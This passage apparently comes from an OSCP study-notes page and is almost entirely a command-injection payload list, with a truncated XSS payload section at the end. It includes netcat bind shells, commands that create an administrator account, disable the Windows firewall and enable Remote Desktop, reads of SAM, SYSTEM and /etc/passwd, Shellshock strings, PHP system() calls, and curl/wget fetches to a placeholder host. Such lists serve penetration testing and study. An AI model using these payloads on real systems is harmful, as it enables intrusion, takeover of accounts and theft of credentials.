IP]/.testing/term_escape.txt?vuln=2?user=\`whoami\`\ \n/bin/ls -al\n\ | nc -lvvp 4444 -e /bin/sh|\ ; nc -lvvp 4444 -e /bin/sh;\ & nc -lvvp 4444 -e /bin/sh&\ && nc -lvvp 4444 -e /bin/sh &\ nc -lvvp 4444 -e /bin/sh\ nc -lvvp 4445 -e /bin/sh &\ nc -lvvp 4446 -e /bin/sh|\ nc -lvvp 4447 -e /bin/sh;\ nc -lvvp 4448 -e /bin/sh&\ \necho INJECTX\nexit\n\033[2Acurl https://example.com/.testing/rce_vuln.txt\n\ \necho INJECTX\nexit\n\033[2Asleep 5\n\ \necho INJECTX\nexit\n\033[2Awget https://example.com/.testing/rce_vuln.txt\n\ | net localgroup Administrators hacker /ADD\ ; net localgroup Administrators hacker /ADD\ & net localgroup Administrators hacker /ADD\ && net localgroup Administrators hacker /ADD\ net localgroup Administrators hacker /ADD\ | netsh firewall set opmode disable\ ; netsh firewall set opmode disable\ & netsh firewall set opmode disable\ && netsh firewall set opmode disable\ netsh firewall set opmode disable\ netstat\ ;netstat -a;\ | netstat -an\ ; netstat -an\ & netstat -an\ && netstat -an\ netstat -an\ | net user hacker Password1 /ADD\ ; net user hacker Password1 /ADD\ & net user hacker Password1 /ADD\ && net user hacker Password1 /ADD\ net user hacker Password1 /ADD\ | net view\ ; net view\ & net view\ && net view\ net view\ \nid|\ \nid;\ \nid\n\ \n/usr/bin/id\n\ perl -e 'print "X"x1024'\ || perl -e 'print "X"x16096'\ | perl -e 'print "X"x16096'\ ; perl -e 'print "X"x16096'\ & perl -e 'print "X"x16096'\ && perl -e 'print "X"x16096'\ perl -e 'print "X"x16384'\ ; perl -e 'print "X"x2048'\ & perl -e 'print "X"x2048'\ && perl -e 'print "X"x2048'\ perl -e 'print "X"x2048'\ || perl -e 'print "X"x4096'\ | perl -e 'print "X"x4096'\ ; perl -e 'print "X"x4096'\ & perl -e 'print "X"x4096'\ && perl -e 'print "X"x4096'\ perl -e 'print "X"x4096'\ || perl -e 'print "X"x8096'\ | perl -e 'print "X"x8096'\ ; perl -e 'print "X"x8096'\ && perl -e 'print "X"x8096'\ perl -e 'print "X"x8192'\ perl -e 'print "X"x81920'\ || phpinfo()\ | phpinfo()\ {${phpinfo()}}\ ;phpinfo()\ ;phpinfo();//\ ';phpinfo();//\ {${phpinfo()}}\ & phpinfo()\ && phpinfo()\ phpinfo()\ phpinfo();\ \ \ \ \ \ \ \ \ :phpversion();\ `ping 127.0.0.1`\ & ping -i 30 127.0.0.1 &\ & ping -n 30 127.0.0.1 &\ ;${@print(md5(RCEVulnerable))};\ ${@print("RCEVulnerable")}\ ${@print(system($_SERVER['HTTP_USER_AGENT']))}\ pwd\ | pwd\ ; pwd\ & pwd\ && pwd\ \r\ | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\ ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\ & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\ && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\ reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f\ \r\n\ route\ | sleep 1\ ; sleep 1\ & sleep 1\ && sleep 1\ sleep 1\ || sleep 10\ | sleep 10\ ; sleep 10\ {${sleep(10)}}\ & sleep 10 \ && sleep 10\ sleep 10\ || sleep 15\ | sleep 15\ ; sleep 15\ & sleep 15 \ && sleep 15\ {${sleep(20)}}\ {${sleep(20)}}\ {${sleep(3)}}\ {${sleep(3)}}\ | sleep 5\ ; sleep 5\ & sleep 5\ && sleep 5\ sleep 5\ {${sleep(hexdec(dechex(20)))}} \ {${sleep(hexdec(dechex(20)))}} \ sysinfo\ | sysinfo\ ; sysinfo\ & sysinfo\ && sysinfo\ ;system('cat%20/etc/passwd')\ system('cat C:\boot.ini');\ system('cat config.php');\ system('cat /etc/passwd');\ || system('curl https://example.com/.testing/rce_vuln.txt');\ | system('curl https://example.com/.testing/rce_vuln.txt');\ ; system('curl https://example.com/.testing/rce_vuln.txt');\ & system('curl https://example.com/.testing/rce_vuln.txt');\ && system('curl https://example.com/.testing/rce_vuln.txt');\ system('curl https://example.com/.testing/rce_vuln.txt')\ system('curl https://example.com/.testing/rce_vuln.txt?req=22fd2wdf')\ system('curl https://example.com/.testing/rce_vuln.txt');\ system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\ systeminfo\ | systeminfo\ ; systeminfo\ & systeminfo\ && systeminfo\ system('ls')\ system('pwd')\ system('pwd');\ || system('sleep 5');\ | system('sleep 5');\ ; system('sleep 5');\ & system('sleep 5');\ && system('sleep 5');\ system('sleep 5')\ system('sleep 5');\ system('wget https://example.com/.testing/rce_vuln.txt?req=22fd2w23')\ system('wget https://example.com/.testing/rce_vuln.txt');\ system('whoami')\ system('whoami');\ test*; ls -lhtR /var/www/\ test* || perl -e 'print "X"x16096'\ test* | perl -e 'print "X"x16096'\ test* & perl -e 'print "X"x16096'\ test* && perl -e 'print "X"x16096'\ test*; perl -e 'print "X"x16096'\ $(`type C:\boot.ini`)\ &&type C:\\boot.ini\ | type C:\Windows\repair\SAM\ ; type C:\Windows\repair\SAM\ & type C:\Windows\repair\SAM\ && type C:\Windows\repair\SAM\ type C:\Windows\repair\SAM\ | type C:\Windows\repair\SYSTEM\ ; type C:\Windows\repair\SYSTEM\ & type C:\Windows\repair\SYSTEM\ && type C:\Windows\repair\SYSTEM\ type C:\Windows\repair\SYSTEM\ | type C:\WINNT\repair\SAM\ ; type C:\WINNT\repair\SAM\ & type C:\WINNT\repair\SAM\ && type C:\WINNT\repair\SAM\ type C:\WINNT\repair\SAM\ type C:\WINNT\repair\SYSTEM\ | type %SYSTEMROOT%\repair\SAM\ ; type %SYSTEMROOT%\repair\SAM\ & type %SYSTEMROOT%\repair\SAM\ && type %SYSTEMROOT%\repair\SAM\ type %SYSTEMROOT%\repair\SAM\ | type %SYSTEMROOT%\repair\SYSTEM\ ; type %SYSTEMROOT%\repair\SYSTEM\ & type %SYSTEMROOT%\repair\SYSTEM\ && type %SYSTEMROOT%\repair\SYSTEM\ type %SYSTEMROOT%\repair\SYSTEM\ uname\ ;uname;\ | uname -a\ ; uname -a\ & uname -a\ && uname -a\ uname -a\ |/usr/bin/id\ ;|/usr/bin/id|\ ;/usr/bin/id|\ $;/usr/bin/id\ () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://[Web IP]/.testing/shellshock.txt?vuln=13;curl http://[Web IP]/.testing/shellshock.txt?vuln=15;\");'\ () { :;}; wget http://[Web IP]/.testing/shellshock.txt?vuln=11\ | wget http://example.com/.testing/rce.txt\ & wget http://example.com/.testing/rce.txt\ ; wget https://example.com/.testing/rce_vuln.txt\ $(`wget https://example.com/.testing/rce_vuln.txt`)\ && wget https://example.com/.testing/rce_vuln.txt\ wget https://example.com/.testing/rce_vuln.txt\ $(`wget https://example.com/.testing/rce_vuln.txt?req=22jjffjbn`)\ which curl\ which gcc\ which nc\ which netcat\ which perl\ which python\ which wget\ whoami\ | whoami\ ; whoami\ ' whoami\ ' || whoami\ ' & whoami\ ' && whoami\ '; whoami\ " whoami\ " || whoami\ " | whoami\ " & whoami\ " && whoami\ "; whoami\ $(`whoami`)\ & whoami\ && whoami\ {{ get_user_file("C:\boot.ini") }}\ {{ get_user_file("/etc/hosts") }}\ {{ get_user_file("/etc/passwd") }}\ {{4+4}}\ {{4+8}}\ {{person.secret}}\ {{person.name}}\ {1} + {1}\ {% For c in [1,2,3]%} {{c, c, c}} {% endfor%}\ {{[] .__ Class __.__ base __.__ subclasses __ ()}}\ \ [PreviousWindows](https://gabb4r.gitbook.io/oscp-notes/file-transfer/windows)\ [NextFind Command Cheatsheet](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet)\ \ Last updated 4 years ago --- # XSS Payload | OSCP Notes Copy �> �; alert(1); �)alert(1);// click --!>
x ">